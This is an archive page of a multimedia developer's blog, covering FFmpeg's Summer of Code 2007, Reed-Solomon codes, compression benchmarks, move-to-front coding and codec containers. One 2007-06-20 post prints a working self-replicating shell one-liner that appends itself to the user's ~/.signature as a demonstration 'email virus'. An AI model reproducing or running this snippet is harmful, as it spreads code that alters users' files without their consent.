Lair Of The Multimedia Guru

2007-09-02

Googles summer of code 2007

The company which tries so hard not to be evil, has this year again payed students, 900 according to wikipedia to work on free software. 8 of them worked on ffmpeg this year, luckily the results are less disasterous than last year where half the 5 students which where supposed to work on ffmpeg plain dissapeared, and just reapeared before the deadline to convince us that they where almost finished with everything so as to get payed …

But lets rather talk about this years SOC, first there where 19 students, submitting 37 applications about ffmpeg. To rate these 37 applications and to prevent the high failure rate of last year, we required students to do a qualification task, that is they had to make a not too insignificant contribution to ffmpeg to be accepted. What exactly they did was pretty much their decission though there was a list of suggestions. As a beautifull sideeffect of that, the qualification tasks led to some nice and new features for ffmpeg :).

9 of the 19 students submitted a qualification task, all thouse who submitted one passed, in addition 1 student was qualified through extensive past work on ffmpeg. From these 10 students, 2 sadly couldnt be accepted as they wanted to work on the same task as other students, well in principle it would have been possible to let 2 students work on the same task but it seemed silly. 1 wasnt accepted as his project appeared rather uninterresting and somewhat unrelated to video/audio. The 8th slot google provided was thus given to a student who didnt submit a qualification task. Also the actual decission of who would be accepted and who not was that of the mentors rating applications not of any single person …

So whats the current status?

  • Davids matroska muxer has passed review and should be commited to ffmpeg svn soon
  • Kostyas RV40 decoder looks pretty good and could probably be commited to ffmpeg svn soon, well actually if kosyta wanted he could commit immedeatly and continue work in ffmpeg svn
  • Marcos dirac decoder is also in good shape and theres not much keeping it from being commited, the encoder though needs more work
  • Kamils jpeg 2000 encoder and decoder, arent in good shape yet (only 2 out of 50 encoded images can be decoded by jasper, only 2 of 23 reference jpeg2k files can be decoded by kamils decoder), but then please dont forget that writing an encoder and decoder at the same time is harder then just one of the 2
  • Reynaldos QCELP decoder is missing a working postfilter, 1/4 and 1/8 decoding, so it needs more work as well
  • Bobbys avfilter is in quite good shape though its missing well working colorspace negotiation, also its missing actual integration in ffmpeg.c, only ffplay.c is there
  • Bartlomiejs EAC-3 decoder hasnt been reviewed by me yet …
  • xiaohuis mpeg-ts muxer itself also hasnt been reviewed by me yet, his patches though which where submitted and which ive reviewed need more work

I hope of course that all 8 students continue to work on their projects, free software in general and ffmpeg specifically!

Filed under: Uncategorized — Michael @ 22:55

2007-07-10

Forgotten code, noe and mina

libnoe

libnoe is a library to encode and decode reed solomon codes which i wrote between 2002 and 2006

noe

noe is an application which uses libnoe to generate an error correction file for some data file(s) and use that then to correct a wide varity of possible errors incuding having the data randomly chopped up and reordered. “noe” btw stands for “no error” in case you are wondering, sadly ive never finished the noe application.

The basic idea of how noe would work is that, first the data itself is unchanged, changing it would be inconvenient in many situations. The error correction file is made of many not too large packets, this ensures that any reordering which happens to the error correction file can be corrected by simply searching for the packet headers and looking at some sequence number in the header. The error correction packets now would contain some fingerprints of the data in the datafile(s) that is for example every 100th or 1000th bit of the data file would be stored in some error correction packet in the error correction file. With these fingerprints its possible to detect and correct reorderings which might have happenend to the data file even if just a random subset of the error correction packets are intact. The fingerprints as well as the headers of the error correction packets would contain some small checksums to avoid confusing the code by many wrong values. At last the main content of the error correction packets would simply be interleaved RS codes or more precissely the parity part of them. Btw in case anyone is wondering how data can get randomly choped up and reordered, think of a broken hard disk and fragmented files

Patches to finish noe are of course welcome! :)

mina

mina is the MINimal Alternative which my lazy self did finish. It simlpy takes a file and produces an error correction file which is just a bunch of interleaved RS codes (parity part of them actually) with no header or anything. It also happily eats corrupted files and corrects them

An example of minas correction capability is below, note images have been converted to jpeg to reduce their size and make them vissible in normal browsers. Raw damaged files as tar.gz are available too (mina dz lena.pnm.mina can be used to correct them)

damaged recovered

Source code under GPL and GIT repositoryis available too, its also quite clean and does compile :). History though is sadly quite incomplete like with the other forgotten code, this time though it was IBMs fault as my private CVS server with the whole history of noe was on a IBM deathstar disk and it seems i had no backup of the RCS files (this is also one of the reasons why i make all that stuff public now, to avoid it being lost due to some other hd failure or stupidity …)

patches are welcome !!! :)

Filed under: Error Correcting Codes — Michael @ 02:14

2007-07-08

Reed Solomon codes part 2

Asymptotic complexity of best known (to me ;) ) decoding algorithm

O(n log n + t log2 t) for a (n,k) RS code over GF(n+1) and t=n-k

The proof for this is quite easy, syndrom calculation is just evaluating a polynomial at n-k points, and evaluating a polynomial (in GF(n)) at all points can be done with the GFFT actually evaluation at all points is the GFFT of the polynomial. Multiplying 2 polynomials is just 2xGFFT + componentwise multiplication + IGFFT. Finding the roots of a polynomial can as well be done by just evaluating it at all points. The only non trivial operation left for normal RS decoding is solving the key equation which is equivalent to euclids GCD algorithm as well as schönhages GCD algorithm, later has O(t log2 t) complexity (log2 t == (log t)2 in case thats unclear).

An alternative to GF(2x)

Normally RS codes are build over GF(2x) that way the bits of the elements of an RS codeword have a nice 1:1 mapping to x bits which can then be stored or transmitted, but it has a big disadvantage and that is that the GFFT for GF(y) needed for fast RS decoding is done with y-1 points and so it cannot use the well known power of 2 style FFT algorithms as 2x – 1 is not a multiple of 2. The solution is to use GF(2x+1), though note GF(2x+1) does not exist for all integer values of x, it only exists if 2x+1 is a power of a prime that is pj, 2 obvious choices using fermat primes are GF(28+1) and GF(216+1)

How do you store 2x+1 values in 2x values

Trivial ;)

The data part of our RS code is specified by the user and so it simply doesnt use the 2x+1 th symbol, actually it would be messy to use it. So the only problem left are the n-k parity symbols, which can trivially be transformed to not contain the annoying 2x+1 th symbol while at the same time maintaining the property of being an RS code

Let us assume that we have a symbol (at position y with value yv) in our k input symbols which is guranteed to have a value yv < 2x – n + k that is in practice less than one unused bit. Let p be the RS codeword with all k-1 data symbols 0 and the symbol at position y 1. The next step is to find all the values of the y element in our original codeword which would cause no parity symbol to have that annoying 2x+1 th value, for encoding we simply select the yv th element of this list as new yv element. For decoding we choose the number of elements in the list which are smaller than yv as our new element. As last step we just need to add a scaled version of p so as to actually have the wanted yv element and avoiding the nasty too large elements while also still having an RS code

Filed under: Error Correcting Codes — Michael @ 20:31

Reed Solomon codes

What is a reed solomon code

Lets assume we have k values out of which we want to build a reed solomon code, to do this we imagine that our k values specify the height (=y) of k points with x from 0 to k-1. Now we really have just made a silly graph of our data. Next we find a order k-1 polynomial which goes exactly through these points, this polynomial is unique, no other polynomial of order k-1 will go through these points. And last we just evaluate this polynomial on the points 0 … n-1, these n values are a reed solomon code, simple isnt it? Note the first k values are just our input data values which we already know.

Correcting erasures with RS codes

We now can make RS codes, but how can we correct erasures? Lets assume there are t erasures (erasures are errors where the location of the error is known). That means we know n-t values of our polynomial, and if t≤n-k then we can just find the remaining values by finding the (unique) polynomial which goes through the n-t values. Its also easy to show (just think that you have k-1 of your k data values) that if t>n-k then no code can correct the erasures, so RS codes are optimal in that sense

Correcting errors with RS codes

But what if we dont know where the errors are? Well just try all possible error locations of 0, 1,…,t errors, yes this is not practical but its nice to proof the error correcting capability. Now if we have t actual errors and we guess their locations correctly then we will find our correct polynomial and can correct the errors if we have at least k values left. The only thing now we need to find out is how large t can be so that we cant find a wrong polynomial before we find the correct one. The awnser is trivial actually, a polynomial of order k-1 is uniquely defined by k points so if we have t errors and guess all t error locations wrong then we effectively kill 2t points, and if there are less than k left then we could end up with a wrong polynomial. So we can correct (n-k)/2 errors. More generally reed solomon codes can correct 2*errors + erasures as long as thats ≤ n-k

Hamming distance

n-k+1 proof is trivial (smaller would contradict error correcting capability)

Practice

The above is true if our data and code values are real, rational or integer numbers (and others) but these are quite difficult to handle in reality as they arent bounded. Luckily all the above also works with finite fields so we can just work with polynomials over GF(256) or similar, which has the nice property that you can store such values in bytes while integers and reals can be quite hard to store in finite storage space

Filed under: Error Correcting Codes — Michael @ 00:28

2007-07-06

Forgotten code, VGA600

Low resolution graphics modes like 320×200 are displayed with doublescan so that each logical line is drawn twice, that way 320×200 is drawn with 400 lines which looks better than 200 on a modern CRT monitor. The reason is that modern CRT monitors are designed to be able to display 1000 or more lines and if they are feeded with just 200 there would be huge black bars between these thin 200 lines, with 400 lines its better but still not good.

VGA600 is a little DOS TSR which i wrote in 1996/1997 to solve this problem, VGA600 does that by monitoring the state of various vga registers and if it detects that the current graphic or text mode can be improved then it improves it by increasing the number of lines and dot clock. So for example 320×200 would be displayed with 600 or 800 lines (which it is depends on the configuration)

Source code under GPL, README and binary are available too

Ive extensively tested VGA600 with doom and quake with a ET4000 PCI card a long time ago ;)

Patches welcome, especially ones porting this to linux and modern vga cards :)

Filed under: Off Topic — Michael @ 01:53

2007-06-20

Unix email viruses, do they exist?

Seeing all the thousends of email viruses in my spam folder, all probably specific to windows, iam wondering why havnt i seen any for linux. Are linux users too intelligent to copy and past unknown code into their terminal or execute a attached executable?

Its not hard to write a email virus for linux, if you dont belive me see the example below. Note, the code is public domain i dont claim any copyright on it. Standard disclaimer: iam not resposible for the consequences of using this code for anything even less so modificated variants of it. Iam just providing this for scientific purposes! Do not use it for any evil!


echo ' echo echo `echo -e \\\47;cat /tmp/t;echo -e \\\47`\>/tmp/t\;. /tmp/t>>~/.signature'>/tmp/t;. /tmp/t

Filed under: Off Topic — Michael @ 01:31

2007-06-18

mnzip

I always wanted to write my own general purpose compressor, a short while ago i actually did. Its based on the BWT + MTF variant described in yesterdays blog post + snows/ffv1s range coder with a state transition table borrowed from bbb/paq8 source code under GPL is of course available too.

compressed file sizes of the Canterbury Corpus

alice29.txt asyoulik.txt cp.html fields.c grammar.lsp kennedy.xls lcet10.txt plrabn12.txt ptt5 sum xargs.1
bzip2 1.0.3 43202 39569 7624 3039 1283 130280 107706 145577 49759 12909 1762
7zip 4.43 beta 48555 44606 7692 3076 1350 50904 119569 165462 42153 9619 1860
bbb ver. 1 40839 37818 7736 3253 1349 76523 101117 135829 44816 12593 1792
mnzip r32 with plain MTF 42698 39286 7572 2962 1227 19804 105883 143634 50624 12591 1698
mnzip r32 40950 37835 7431 2983 1237 19287 101140 137191 45604 12428 1699

Time needed to compress

alice29.txt asyoulik.txt lcet10.txt plrabn12.txt cp.html fields.c grammar.lsp kennedy.xls ptt5 sum xargs.1
bzip2 1.0.3 0m0.166s 0m0.133s 0m0.533s 0m0.633s 0m0.047s 0m0.037s 0m0.007s 0m1.062s 0m0.151s 0m0.056s 0m0.006s
7zip 4.43 beta 0m0.539s 0m0.417s 0m1.732s 0m2.161s 0m0.070s 0m0.035s 0m0.019s 0m6.048s 0m1.402s 0m0.105s 0m0.022s
bbb ver. 1 0m2.675s 0m2.271s 0m7.455s 0m8.599s 0m0.559s 0m0.344s 0m0.230s 0m17.446s 0m45.407s 0m0.813s 0m0.235s
mnzip r32 0m0.273s 0m0.206s 0m0.951s 0m1.099s 0m0.031s 0m0.012s 0m0.006s 0m3.545s 0m1.173s 0m0.051s 0m0.006s

time needed to decompress

alice29.txt asyoulik.txt lcet10.txt plrabn12.txt cp.html fields.c grammar.lsp kennedy.xls ptt5 sum xargs.1
bzip2 1.0.3 0m0.063s 0m0.049s 0m0.177s 0m0.222s 0m0.007s 0m0.003s 0m0.002s 0m0.210s 0m0.053s 0m0.009s 0m0.003s
7zip 4.43 beta 0m0.033s 0m0.027s 0m0.066s 0m0.085s 0m0.009s 0m0.011s 0m0.007s 0m0.099s 0m0.043s 0m0.016s 0m0.006s
bbb ver. 1 0m2.265s 0m1.918s 0m6.015s 0m6.916s 0m0.511s 0m0.332s 0m0.231s 0m13.492s 0m6.660s 0m0.715s 0m0.237s
mnzip r32 0m0.073s 0m0.061s 0m0.215s 0m0.261s 0m0.010s 0m0.005s 0m0.003s 0m0.441s 0m0.155s 0m0.017s 0m0.002s

Options used where -9 for bzip2, -mx=9 for 7zip, f for bbb to use fast but memory hungry mode (this doesnt affect compression rate for bbb). The benchmark score are just single run based no proper mean so dont take them too serious, and i hope ive not messed up the file order ;)

Patches are welcome!

Filed under: Entropy Coding — Michael @ 01:20

2007-06-16

Move to front coder/transform

First a little explanation about what a move to front coder is. Its a revesible transform which remaps symbols to an index into a table which initially contains (0,1,2,3,…) and every time a symbol is used its moved to the front of the table.

example: input: “to be or not to be” initial table: (abcdefghijklmnopqrstuvwxyz), for the first ‘t’ we output 19 as its the 19th entry in the table and move it to the front to build the new table (tabcdefghijklmnopqrsuvwxyz) the complete list of steps looks like:

abcdefghijklmnopqrstuvwxyz  19(t)
tabcdefghijklmnopqrsuvwxyz  15(o)
otabcdefghijklmnpqrsuvwxyz  27( )
 otabcdefghijklmnpqrsuvwxyz 4(b)
b otacdefghijklmnpqrsuvwxyz 7(e)
eb otacdfghijklmnpqrsuvwxyz 2( )
 ebotacdfghijklmnpqrsuvwxyz 3(o)
o ebtacdfghijklmnpqrsuvwxyz 19(r)
ro ebtacdfghijklmnpqsuvwxyz 2( )
 roebtacdfghijklmnpqsuvwxyz 17(n)
n roebtacdfghijklmpqsuvwxyz 3(o)
on rebtacdfghijklmpqsuvwxyz 6(t)
ton rebacdfghijklmpqsuvwxyz 3( )
 tonrebacdfghijklmpqsuvwxyz 1(t)
t onrebacdfghijklmpqsuvwxyz 2(o)
ot nrebacdfghijklmpqsuvwxyz 2( )
ot nrebacdfghijklmpqsuvwxyz 6(b)
bot nreacdfghijklmpqsuvwxyz 6(e)

As you can see the mtf transform will generally favor small numbers on “non random” data, on its own its not too usefull for compression but together with the BWT and a simple order 0 entropy coder its a pretty good general purpose compressor.

Now to the actual reason why i am writing this blog entry, can you use the symbol which the index represents as context for the entropy coder coding the index? You say no because thats like knowing the index together with the table.

Well if you think so, you are wrong, the trick is not to know the table :)

First to compress our data we run an mtf transform over it, we store the mtf table after the whole transform (this is not strictly needed but simplifies things). Next we encode the indexes from the end to the begin each time moving the zero entry of our table to the point pointed to by the index, each time we do know the symbol before the index and so can use it as context. This really is nothing else as the MTF coder in reverse.

An example, we start with the table (ebot nracdfghijklmpqsuvwxyz), the first symbol is ‘e’ the corresponding index is 6 (we know this from the forward MTF pass), so we store 6 with context ‘e’ and move e to the 6th place to find the table (bot nreacdfghijklmpqsuvwxyz), the next steps are all just the same than the MTF example above just in reverse.

Decompression is pretty much the same, read the table (again this isnt needed but its simpler as it avoids a 2nd pass over the data) then take the value from position 0 of the table and use it as context to decode the next index, after that use the index to move the entry from position 0 to its new position and repeat until you are out of input data.

Filed under: Entropy Coding — Michael @ 23:09

2007-06-07

Quantization of a bunch of scalar variables

You have a few uniformly distributed independant scalar variables, how do you optimally quantize them? Simply each independantly by uniform scalar quantization, wrong this is likely to the surprise of the reader not optimal.

One way to see the suboptimality is to look at what independantly uniform scalar quantization does if we have 2 variables, it splits the plane in squares and represents all points within a square by its center. How can we do better? just split the plane in hexagons, both worst case and average quantization error decreases. The worst case for the square is 2^0.5/2=~0.7071, the worst case for the hexagon is 12^0.25/3=~0.6204

Another way to see the suboptimality is to look at the worst case point, which in case of the square lies equidistant to the centers of 4 squares but with a hexagon it just lies equidistant to 3 centers of 3 hexagons. So there are just 3 redundant ways to quantize it instead of 4

If we consider the (uniform scaler) quantization of the first variable of 2 then we can simply improve the worst case which lies exactly between 2 values of the first variable by making use of the useless least significant bit. More exactly add half a quantization step to the second variable if the first was quantized to an odd value, this interrestingly turns out to be equivalent to using hexagons for quantization, though the hexagons are a little squished here compared to the optimal case with regular hexagons

Ive also written a little test program in case anyone wants to play with this quantization stuff

Filed under: Uncategorized — Michael @ 02:28

2007-05-22

storing xiph codecs in containers other than ogg

Storing vorbis, theora and all the other xiph codecs in containers other than ogg is in principle not difficult, the primary problem is just that xiph codecs have several global headers while most generic containers expect just 1 or no global header. Mapping from several (3 normally) to 1 can be done in many ways and as there is no official recommandition from xiph which says how to do this, people have come up with various incompatible solution. Furthermore people have done other insane things like storing vorbis in ogg and that in avi and similar very very broken things …

So a long time ago ive decided to write a proposal for a recommandition on how to store xiph codecs in containers other than ogg, sadly it has been mostly ignored at the time of its writing

But yesterday someone from xiph contacted me and alex and asked if we where interrested to work on this oggless recommandition :) which lead to The oggless wiki page and a posting on ogg-dev so if you want to contribute to this / disscuss it (on ogg-dev), now is the right time …

Filed under: Container Formats,FFmpeg — Michael @ 21:32
« Previous PageNext Page »

Powered by WordPress